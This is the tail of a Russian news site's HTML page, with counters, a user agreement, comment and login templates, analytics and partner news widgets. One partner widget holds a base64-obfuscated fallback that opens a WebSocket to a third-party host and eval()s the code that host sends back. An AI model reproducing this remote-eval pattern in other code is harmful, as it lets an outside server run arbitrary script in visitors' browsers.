		<div id="partner_{{item.type}}_{{item.id}}"></div>
	</div>
    </div>
</td>
</tr>
</table>
<div ng-show="busy" style="background-color: rgba(0,66,157,1);color: #ffffff;padding:20px;text-align: center;font-size: 16px; clear: both;" ng-cloak>Загрузка...</div>
<script>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</script>
<script language="JavaScript" type="text/javascript">
	<!--
	cntr_d=document;
	uralweb_a='';
	uralweb_a+='&r='+escape(cntr_d.referrer);
	cntr_js=10;
	var mailru_a='';
	mailru_a+=';r='+escape(cntr_d.referrer);
	Md=document;
	Mnv=navigator;
	Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;
	Mt=(new Date()).getTimezoneOffset();
	Mz="&t="+Mt;
	Md.cookie="b=b";
	Mc=0;
	if(Md.cookie)Mc=1;
	Mz+='&c='+Mc;
	Msl="1.0";
	//-->
</script>
<script language="JavaScript1.1" type="text/javascript">
	<!--
	uralweb_a+='&j='+navigator.javaEnabled();
	cntr_js=11;
	mailru_a+=';j='+navigator.javaEnabled();
	Mpl="";
	Msl="1.1";
	Mj = (Mnv.javaEnabled()?"Y":"N");
	Mz+='&j='+Mj;
	//-->
</script>
<script language="JavaScript1.2" type="text/javascript">
	<!--
	cntr_s=screen;
	uralweb_a+='&s='+cntr_s.width+'*'+cntr_s.height;
	uralweb_a+='&d='+(cntr_s.colorDepth?cntr_s.colorDepth:cntr_s.pixelDepth);
	cntr_js=12;
	mailru_a+=';s='+cntr_s.width+'*'+cntr_s.height;
	mailru_a+=';d='+(cntr_s.colorDepth?cntr_s.colorDepth:cntr_s.pixelDepth);
	Msl="1.2";
	//-->
</script>
<script language="JavaScript1.3" type="text/javascript">
	<!--
	cntr_js=13;
	Msl="1.3";
	//-->
</script>
		</td>
	</tr>
</table>
<div style="display: none;" id="right_blocks">
	echo "<div class=\"right-block\"></div>";
		<div class="right-story right-block"><div class="block-title"><span>Актуальные сюжеты</span></div><ul><li><div class="scale" style="background-image: url(https://s.ura.news/pics/240/125/images/news/upload/2016/09/02/223442_Zhara_v_Ekaterinburge_vandalizm_ulichnoe_iskusstvo_pokemon_go_pokemoni_1300x360_3623.1002.0.332.jpg);"></div><div class="overlay"></div><a href="/story/253">Дело блогера, ловившего покемонов в Храме-на-Крови</a></li><li><div class="scale" style="background-image: url(https://s.ura.news/pics/240/125/images/news/upload/story/322/23925_Evromaydan_Kiev_Ukraina__flag_ukraini_flag_evrosoyuza_1300x360_4928.1363.0.320.jpg);"></div><div class="overlay"></div><a href="/story/322">Евровидение в Киеве</a></li><li><div class="scale" style="background-image: url(https://s.ura.news/pics/240/125/images/news/upload/2016/12/12/237775_Naina_Elytsina_u_Elytsin_Tsentra_Ekaterinburg_elytsin_tsentr_1300x360_3259.902.0.717.jpg);"></div><div class="overlay"></div><a href="/story/279">Скандал с Ельцин Центром</a></li><li><div class="scale" style="background-image: url(https://s.ura.news/pics/240/125/images/news/upload/2015/03/17/e4af40b6e58f8379e7276dd0b9b6d715.jpg);"></div><div class="overlay"></div><a href="/story/103">Битва за храм</a></li></ul></div>
	
<div class="right-comments right-block">
	<table>
		<tr>
			<td><div class="block-title"><span>Самое комментируемое</span></div></td>
			<!--<td class="right-comments-tab right-comments-active" data-list="right-comments-list-comments">Самое комментируемое</td>-->
			<!--<td class="right-comments-tab" data-list="right-comments-list-visits">Самое читаемое</td>-->
		</tr>
	</table>
	<table class="right-comments-list right-comments-active right-comments-list-comments">
	<tr><td class="comments-count">+154</td><td><a href="/news/1052291429">Пенсии не&nbsp;будут расти до&nbsp;2035 года. В&nbsp;правительстве сказали, когда доходы россиян вернутся к&nbsp;докризисному уровню</a></td></tr><tr><td class="comments-count">+144</td><td><a href="/news/1052292133">Эксперты нашли доказательства, что &laquo;Боинг&raquo; над Донбассом сбили русские. ФОТО</a></td></tr><tr><td class="comments-count">+118</td><td><a href="/news/1052291387">Порошенко обвинил Путина в&nbsp;&laquo;похищении&raquo; княжны Анны Ярославны в&nbsp;историю России</a></td></tr><tr><td class="comments-count">+111</td><td><a href="/news/1052291660">В&nbsp;челябинском исполкоме партии власти смена кадров</a></td></tr><tr><td class="comments-count">+109</td><td><a href="/news/1052291469">Россияне могут отомстить на&nbsp;президентских выборах за&nbsp;нулевой рост пенсий</a></td></tr>
	</table>
	<table class="right-comments-list right-comments-list-visits">
		<tr>
			<td><a href="" class="icon icon-visits"></a></td>
			<td><a href=""></a></td>
		</tr>
	</table>
</div>
</div>
	</div>
</div>
<div id="eula" style="display: none;">
	<div id="eula_header">
		<div id="eula_close"></div>
		<noindex><div class="h1">Пользовательское соглашение</div></noindex>
	</div>
	<div style="overflow-y: scroll;height: calc(100% - 60px);">
		<div>
			<div><noindex>
				<p>Настоящее Пользовательское соглашение (далее — «Соглашение») регламентирует отношения между ООО «Ура.ру» (далее — Общество) – российским информационным агентством и физическим или юридическим лицом, индивидуальным предпринимателем (далее – Пользователь) по использованию сайта <A HREF="http://ura.ru">ura.ru</A> (далее – Сайт). Настоящее Соглашение является публичной офертой Общества. Используя Сайт, в том числе, путем просмотра страниц и материалов Сайта, добавления информации, Пользователь подтверждает, что он ознакомлен и согласен с настоящим Пользовательским соглашением и означает присоединение Пользователя к настоящему Соглашению и безоговорочное принятие его условий путем осуществления конклюдентных действий.</p>

				<p>Принимая настоящее Соглашение, Пользователь:</p>
				<ol>
					<li>Подтверждает, что ознакомился и согласен с условиями настоящего Соглашения.</li>
					<li>Обязуется использовать Сайт и его материалы в соответствии с действующим законодательством Российской Федерации, в том числе законодательством об интеллектуальной собственности и средствах индивидуализации, законодательством о рекламе и средствах массовой информации.</li>
					<li>Осознает, что Сайт может содержать отдельные материалы, предназначенные только для Пользователей, достигших 18 лет.</li>
					<li>Обязуется не публиковать в открытом доступе адреса электронной почты, почтовые адреса, номера телефонов, ссылки и иные личные (персональные) данные третьих лиц.</li>
					<li>Обязуется не публиковать (обнародовать) на Сайте оскорбления, клевету, нецензурные выражения, порнографические материалы, и материалы, демонстрирующие или пропагандирующие жестокость, террор или насилие, оскорбляющие человеческое достоинство или религиозные чувства верующих, а также иные материалы, не соответствующие действующему законодательству Российской Федерации.</li>
					<li>Обязуется не вводить в заблуждение других Пользователей, не вступать в контакт с другими Пользователями в случае совершения ими действий, явно свидетельствующих о нежелании контактировать с Пользователем или совершать иные действия в отношении других Пользователей, явно или косвенно противоречащие действующему законодательству Российской Федерации.</li>
					<li>Обязуется не использовать без согласования с Общества Сайт для привлечения внимания других Пользователей к товарам, работам или услугам, производимым, реализуемым, выполняемым или оказываемым Пользователем или иными лицами, не использовать Сайт для распространения материалов, в том числе, рекламных или носящих политический (агитационный) характер.</li>
					<li>Отчуждает в пользу Общества исключительное право на материалы, добавленные Пользователем на Сайт или переданные им Обществу иным способом, по кабелю, проводам или с помощью иных аналогичных средств, таким образом, при котором любое лицо может иметь доступ к нему в интерактивном режиме из любого места и в любое время по своему выбору.</li>
					<li>Дает согласие Обществу на использование его изображения в соответствии со ст.152.1 ГК РФ без какого-либо вознаграждения в рекламных, аналитических, художественных, коммерческих и иных целях на неограниченный срок.</li>
					<li>Обязуется не использовать (копировать, тиражировать, распространять, экспортировать, обнародовать, передавать третьим лицам и т.п.) материалы, размещённые на Сайте.</li>
					<li>В случае если Обществом были внесены в Соглашение любые изменения, с которыми Пользователь не согласен, Пользователь обязан прекратить эксплуатацию Сайта. Возобновление использования означает согласие Пользователя с новой редакцией Соглашения.</li>
				</ol>

				<p>Общество оставляет за собой право:</p>
				<ol>
					<li>Вносить изменения в данное Соглашение в одностороннем порядке без какого-либо специального уведомления. Новая редакция Соглашения вступает в силу с момента ее размещения на Сайте.</li>
					<li>Редактировать или удалять материалы, опубликованные Пользователем на Сайте, если они не соответствуют условиям данного Соглашения, наносят вред Обществу или третьим лицам.</li>
					<li>Отказывать Пользователю в доступе к Сайту в случае нарушения последним условий настоящего Соглашения.</li>
					<li>Использовать материалы, созданные Пользователем на Сайте и находящиеся в открытом доступе, в частности, в целях разработки рекламных материалов, размещения материалов на сайтах партнеров Компании и в других целях.</li>
					<li>Передавать права и данные, полученные от Пользователя по настоящему Соглашению, третьим лицам в целях исполнения настоящего Соглашения или в силу закона без дополнительного согласия Пользователя.</li>
				</ol>

				<p>Общество не несет ответственности:</p>
				<ol>
					<li>За содержание, достоверность и точность материалов, опубликованных Пользователями.</li>
					<li>За причинение вреда, ущерба, потерю информации или за причинение любых других убытков любым лицам, которые возникли при пользовании сервисом Сайта, в том числе с использованием мобильных средств связи и иных средств телекоммуникаций.</li>
					<li>За нарушение Пользователем авторских и иных прав третьих лиц путем опубликования (обнародования) материалов, не соответствующих действующему законодательству, добавленных Пользователем на Сайт или переданных им Обществу иным способом.</li>
				</ol></noindex>
			</div>
		</div>
	</div>
</div>
<script type="text/ng-template" id="comment.html">
	<div id="comment_{{comment.id}}" class="comment-content">
		<div class="comment-avatar" back-img="{{comment.avatar}}"></div>
		<div class="comment-user">
			<div class="comment-name" ng-bind-html="comment.name"></div>
			<div class="comment-time" ng-bind-html="comment.time"></div>
		</div>
		<div class="clear"></div>
		<div class="comment-text" ng-bind-html="comment.comment"></div>
		<div class="comment-btns">
			<div class="btn-group">
				<div class="btn-s btn-up" ng-click="karmaUp(comment)">{{comment.karma_plus}}</div>
				<div class="btn-s btn-down" ng-click="karmaDown(comment)">{{comment.karma_minus}}</div>
			</div>
			<div class="btn-s reply" id="show_comment_form_{{comment.id}}" ng-click="reply(item, comment)">ответить</div>
		</div>
	</div>
	<div id="comment_form_{{comment.id}}" class="comment-form-container"></div>
	<div id="comment_success_{{comment.id}}" class="comment-success-container"></div>
	<div class="child-comments" ng-if="comment.childs_count>0">
		<div ng-repeat="comment in comment.comments" ng-include="'comment.html'"></div>
	</div>
</script>

<script type="text/ng-template" id="top_comment.html">
	<div ng-if="comment.level==0||(comment.level==1&&$index==0)" ng-class="{'hide-last-comment':$index==9&&!comment.comments}" ng-click="expandComments2(item, null, $index, comment.comments?1:0, 0)">
		<div class="comment-before"></div>
		<div class="comment-content" id="comment_{{comment.id}}">
			<div class="clear">
				<div class="comment-avatar" back-img="{{comment.avatar}}"></div>
				<div class="comment-user">
					<div class="comment-name" ng-bind-html="comment.name"></div>
					<div class="comment-time" ng-bind-html="comment.time"></div>
				</div>
			</div>
			<div class="comment-text" ng-bind-html="comment.comment"></div>
			<div class="comment-btns">
				<div class="btn-group">
					<div class="btn-s btn-up" ng-click="karmaUp(comment)">{{comment.karma_plus}}</div>
					<div class="btn-s btn-down" ng-click="karmaDown(comment)">{{comment.karma_minus}}</div>
				</div>
				<div class="btn-s reply" ng-click="expandAndReply(item, comment)">ответить</div>
			</div>
			<div class="child-comments" ng-if="comment.level==0&&comment.comments" ng-class="{'hide-last-comment':$index==9&&comment.comments}" ng-click="expandComments2(item, null, $index, comment.comments?1:0, 1)">
				<div ng-repeat="comment in comment.comments" ng-include="'top_comment.html'"></div>
			</div>
			<div class="btn-expand" ng-if="comment.level==0&&comment.all_count>1&&$index!=9" ng-click="expandComments(item, comment)">еще {{comment.all_count-1}}</div>
		</div>
	</div>
</script>

<script type="text/ng-template" id="comment_form.html">
	<!--<div class="comment-form-close" ng-click="cf.close()" ng-if="cf.data.parent_id"></div>-->
	<div class="comment-form form form-a">
		<textarea ng-model="cf.data.text"></textarea>
		<span class="error">{{cf.errors.text}}</span>
		<div ng-if="!user.is_auth || user.is_anonymous">
			<div class="form-bottom form-pad" ng-show="cf.tabs.name">
				<span class="error" style="margin-left:130px;">{{cf.errors.name}}</span>
				<label for="comment_user_name" class="flex" ng-class="{'error':cf.errors.name}">
					<span class="label" style="width:110px;">Укажите ваше имя:</span>
					<input type="text" ng-model="cf.data.user_name"/>
				</label>
				<div class="clear"></div>
				<button class="btn btn-send" style="float:right;" ng-click="cf.submit()">ответить</button>
				<p>войти <a class="btn-link" ng-click="cf.changeTab('social')">через соцсети</a> или <a class="btn-link" ng-click="cf.changeTab('email')">профиль на ura.ru</a></p>
				<div class="clear"></div>
			</div>
			<div class="form-bottom form-hor form-pad" ng-show="cf.tabs.email">
				<div class="flex">
					<div class="label" style="line-height: 35px;width:165px;text-align: right;">Войдите в профиль на ura.ru</div>
				</div>
				<span class="error" style="margin-left:185px;">{{cf.errors.email}}</span>
				<label for="comment_user_email" class="flex" ng-class="{'error':cf.errors.email}">
					<span class="label" style="width:165px;text-align: right;">email:</span>
					<input type="text" ng-model="cf.data.user_email"/>
				</label>
				<span class="error" style="margin-left:185px;">{{cf.errors.password}}</span>
				<label for="comment_user_password" class="flex" style="position: relative;" ng-class="{'error':cf.errors.password}">
					<span class="label" style="width:165px;text-align: right;">пароль:</span>
					<input type="password" style="padding-right: 90px;" ng-model="cf.data.user_password"/>
					<a class="btn-link" style="position: absolute;font-size:10px;line-height: 12px;top: 11px;right: 10px;">забыли пароль?</a>
				</label>
				<div class="clear"></div>
				<button class="btn btn-send" style="float:right;" ng-click="cf.submit()">ответить</button>
				<p>войти <a class="btn-link" ng-click="cf.changeTab('social')">через соцсети</a> или просто <a class="btn-link" ng-click="cf.changeTab('name')">укажите имя</a></p>
				<div class="clear"></div>
			</div>
			<div class="form-bottom form-pad" ng-show="cf.tabs.social">
				<div class="label">Войдите через соцсети</div>
				<div style="margin: 10px 0;height: 40px;">
					<a href="" class="icon icon-40 icon-vk" ng-click="cf.oauth('vk')"></a>
					<a href="" class="icon icon-40 icon-tw" ng-click="cf.oauth('tw')"></a>
					<a href="" class="icon icon-40 icon-fb" ng-click="cf.oauth('fb')"></a>
					<a href="" class="icon icon-40 icon-ok" ng-click="cf.oauth('ok')"></a>
					<a href="" class="icon icon-40 icon-google"></a>
				</div>
				<div class="clear">войти <a class="btn-link" ng-click="cf.changeTab('email')">в профиль на ura.ru</a> или просто <a class="btn-link" ng-click="cf.changeTab('name')">укажите имя</a></div>
			</div>
			<span class="error">{{cf.errors.form}}</span>
		</div>
		<div ng-if="user.is_auth && !user.is_anonymous">
			<div class="form-bottom form-pad">
				<span class="error">{{cf.errors.form}}</span>
				<button class="btn btn-send" style="float:right;" ng-click="cf.submit()">ответить</button>
				<i class="icon icon-google" style="float: left;"></i><p>вы вошли как {{user.name}}</p>
				<div class="clear"></div>
			</div>
		</div>
	</div>
</script>

<script type="text/ng-template" id="login_panel.html">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</script>
<!-- Yandex.Metrika counter -->
<script type="text/javascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter1130914 = new Ya.Metrika({id:1130914, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks");</script><noscript><div><img src="//mc.yandex.ru/watch/1130914" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-56019874-1', 'auto');
  /*ga('send', 'pageview');*/
  ga('send', {
	  hitType: 'pageview',
	  page: location.pathname
  });

  //console.log('GA send from index.html.php');

</script>

<div id="partner" style="position: absolute;top:0;left: -9999px;">
	<div id="mm">
		<span class='title'>Сегодня в СМИ</span>
		<script src='//mediametrics.ru/partner/inject/inject.js' type='text/javascript' id='MediaMetricsInject' data-width='214' data-height='360' data-img='false' data-type='std' data-bgcolor='FFFFFF' data-bordercolor='0039ab' data-linkscolor='000000' data-transparent='true' data-rows='6' data-inline='' data-font='small' data-fontfamily='georgia' data-border='' data-borderwidth='0' data-alignment='vertical' data-country='ru' data-site='mmet/ura_ru' data-hash='8a393750437e1a2015c1427237d9b399'> </script>
	</div>
	<div id="smi81774">
		<span class='title'>новости партнеров</span>
		<div id="smi2adblock_81774"><a href="http://smi2.net/">Новости СМИ2</a></div><script type="text/javascript" charset="utf-8">(function(){var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true; sc.src = '//news.smi2.ru/data/js/81774.js'; sc.charset = 'utf-8'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);}());</script>
	</div>
	<div id="redtram29859">
		<span class='title'>новости партнеров</span>
		<div id="n4p_29859"></div><script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if(location.protocol=="https:"){o.src="https://js-ru.redtram.com/n4p/0/29/ticker_29859.js";}else{o.src="http://js.ru.redtram.com/n4p/0/29/ticker_29859.js";}var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
	</div>
	<div id="smi_24">
		<span class='title'>новости партнеров</span>
		<style>.smi_table_2920 {line-height: 15px;}</style>
		<div sryle="line-he" id="smi_teaser_2920"><center><a href="http://24smi.info">новости</a></center></div><script type="text/JavaScript" encoding="utf8">(function() {var sm = document.createElement("script");sm.type = "text/javascript";sm.async = true;sm.src = "//jsn.24smi.net/4/6/2920.js";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(sm, s);})();</script>
	</div>
	<div id="smi13836">
		<span class='title'>новости партнеров</span>
		<script id="r17298" type="text/javascript">
			(function() {
				var worker17298,
					tickerID = 17298,
					tag = document.getElementById('r'+ tickerID),
					id = (function(tickerID) {
						var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
						if ('btoa' in window)
							return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
						return 'g4p_'+ tickerID +'_'+ now;
					})(tickerID);

				var container = document.createElement('div');
				container.id = id;
				container.innerHTML = 'загрузка...';
				tag.parentNode.insertBefore(container, tag);

				var script = document.createElement('script');
				script.src = '//js-goods.redtram.com/ticker_'+ tickerID +'.js';
				script.type = 'text/javascript';
				script.charset = 'utf-8';
				script.onerror = function() {
					if (!('atob' in window && 'Worker' in window))
						return;
					window.rtIsWebSocket = true;

					var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vZzRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

					function runExternalMessage(data) {
						worker17298.postMessage(data);
					}

					worker17298 = new Worker(URL.createObjectURL(
						new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
					));

					worker17298.onmessage = function(m) {
						var json = JSON.parse(m.data),
							content = JSON.parse(json)['content'];
						eval(content);
					};

					worker17298.postMessage(JSON.stringify({
						command: 'init',
						informer_id: tickerID,
					}));
				};
				tag.parentNode.insertBefore(script, tag);
			})();
		</script>
	</div>
</div>


</body>
</html>
